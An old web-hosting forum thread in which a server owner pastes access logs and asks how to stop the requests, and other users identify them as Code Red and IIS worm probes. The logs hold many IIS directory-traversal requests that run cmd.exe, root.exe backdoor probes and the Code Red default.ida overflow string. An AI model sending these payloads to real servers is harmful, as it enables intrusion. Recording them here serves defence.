How to stop this process?

tekdns · Jun 15, 2003

Hi,

How to stop/block these below process;

"12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
12.224.137.0 - - [15/Jun/2003:04:33:51 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 -
127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
127.0.0.1 - - [15/Jun/2003:04:37:30 -0400] "GET / HTTP/1.0" 200 2673
66.168.234.28 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:04:40:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17559
218.70.224.215 - - [15/Jun/2003:04:40:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
217.219.246.4 - - [15/Jun/2003:04:44:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
66.190.164.146 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:57 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:44:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:02 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:04 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
66.190.164.146 - - [15/Jun/2003:04:45:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.190.164.146 - - [15/Jun/2003:04:45:07 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.190.164.146 - - [15/Jun/2003:04:45:08 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.190.164.146 - - [15/Jun/2003:04:45:09 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
127.0.0.1 - - [15/Jun/2003:04:45:50 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:04:50:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18253
66.82.121.147 - - [15/Jun/2003:04:51:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:04:54:11 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:04:55:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18059
66.227.42.208 - - [15/Jun/2003:04:57:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
66.31.55.164 - - [15/Jun/2003:04:57:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.31.55.164 - - [15/Jun/2003:04:57:47 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
66.126.168.169 - - [15/Jun/2003:04:57:48 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
24.130.75.129 - - [15/Jun/2003:04:58:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
127.0.0.1 - - [15/Jun/2003:05:00:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18040
127.0.0.1 - - [15/Jun/2003:05:02:31 -0400] "GET / HTTP/1.0" 200 2673
127.0.0.1 - - [15/Jun/2003:05:05:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18264
12.224.137.0 - - [15/Jun/2003:05:08:53 -0400] "GET /..%255c..%280
12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/

....................."

Becouse, after these process, my server down.

Thanks for your help

cPanel.net Support Ticket Number:

promak · Jun 15, 2003

This is code red
try to search code red in this forums .

cPanel.net Support Ticket Number:

tAzMaNiAc · Jun 16, 2003

Those processes havenothing to do with why your server went down. Those are windows machines looking to attack windows machines with the IIS vulnerabilities.

Unless you are running IIS and some strange configuration (CPanel DOES Not run IIS ), this is not the problem..

Brenden

cPanel.net Support Ticket Number:

Website Rob · Jun 16, 2003

It is possible that too many connection attempts were coming in too fast, creating a 'mini' DDOS attack. A brief look showed double-digit attempts per second.

Do a search on this forum for 'sumthin' as there is some good information in one of the posts about what to do in these type situations.

cPanel.net Support Ticket Number:

Forums

The Community Forums

Interact with an entire community of cPanel & WHM users!

How to stop this process?

tekdns Well-Known Member

promak Well-Known Member

tAzMaNiAc Well-Known Member

Website Rob Well-Known Member

Stop MySQL Processes

SOLVED PHP Process limit stopping script from running

Stopping Restarting of Outdated Services

SOLVED Stop extra DNS records being created for addon domains

Detect and Stop Outgoing Spam?

Share This Page

Useful Searches

The Community Forums

Interact with an entire community of cPanel & WHM users!

How to stop this process?

tekdns Well-Known Member

promak Well-Known Member

tAzMaNiAc Well-Known Member

Website Rob Well-Known Member

Stop MySQL Processes

SOLVED PHP Process limit stopping script from running

Stopping Restarting of Outdated Services

SOLVED Stop extra DNS records being created for addon domains

Detect and Stop Outgoing Spam?

Share This Page